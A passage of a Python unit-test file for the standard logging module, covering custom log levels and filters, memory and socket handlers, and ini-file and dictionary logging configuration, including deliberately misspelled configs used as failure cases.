spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warn(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
def apply_config(self, conf):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
class LogRecordStreamHandler(StreamRequestHandler):
"""Handler for a streaming logging request. It saves the log message in the
TCP server's 'log_output' attribute."""
TCP_LOG_END = "!!!END!!!"
def handle(self):
"""Handle multiple requests - each expected to be of 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally."""
while True:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unpickle(chunk)
record = logging.makeLogRecord(obj)
self.handle_log_record(record)
def unpickle(self, data):
return pickle.loads(data)
def handle_log_record(self, record):
# If the end-of-messages sentinel is seen, tell the server to
# terminate.
if self.TCP_LOG_END in record.msg:
self.server.abort = 1
return
self.server.log_output += record.msg + "\n"
class LogRecordSocketReceiver(ThreadingTCPServer):
"""A simple-minded TCP socket-based logging receiver suitable for test
purposes."""
allow_reuse_address = 1
log_output = ""
def __init__(self, host='localhost',
port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=LogRecordStreamHandler):
ThreadingTCPServer.__init__(self, (host, port), handler)
self.abort = False
self.timeout = 0.1
self.finished = threading.Event()
def serve_until_stopped(self):
while not self.abort:
rd, wr, ex = select.select([self.socket.fileno()], [], [],
self.timeout)
if rd:
self.handle_request()
# Notify the main thread that we're about to exit
self.finished.set()
# close the listen socket
self.server_close()
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.tcpserver = LogRecordSocketReceiver(port=0)
self.port = self.tcpserver.socket.getsockname()[1]
self.threads = [
threading.Thread(target=self.tcpserver.serve_until_stopped)]
for thread in self.threads:
thread.start()
self.sock_hdlr = logging.handlers.SocketHandler('localhost', self.port)
self.sock_hdlr.setFormatter(self.root_formatter)
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.tcpserver.abort = True
del self.tcpserver
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
for thread in self.threads:
thread.join(2.0)
finally:
BaseTest.tearDown(self)
def get_output(self):
"""Get the log output as received by the TCP server."""
# Signal the TCP receiver and wait for it to terminate.
self.root_logger.critical(LogRecordStreamHandler.TCP_LOG_END)
self.tcpserver.finished.wait(2.0)
return self.tcpserver.log_output
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
logger.debug("eggs")
self.assertEqual(self.get_output(), "spam\neggs\n")
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
try:
warnings.filterwarnings("always", category=UserWarning)
file = io.StringIO()
h = logging.StreamHandler(file)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = file.getvalue()
h.close()
self.assertTrue(s.find("UserWarning: I'm warning you...\n") > 0)
#See if an explicit file uses the original implementation
file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
file, "Dummy line")
s = file.getvalue()
file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
finally:
logging.captureWarnings(False)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
#Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
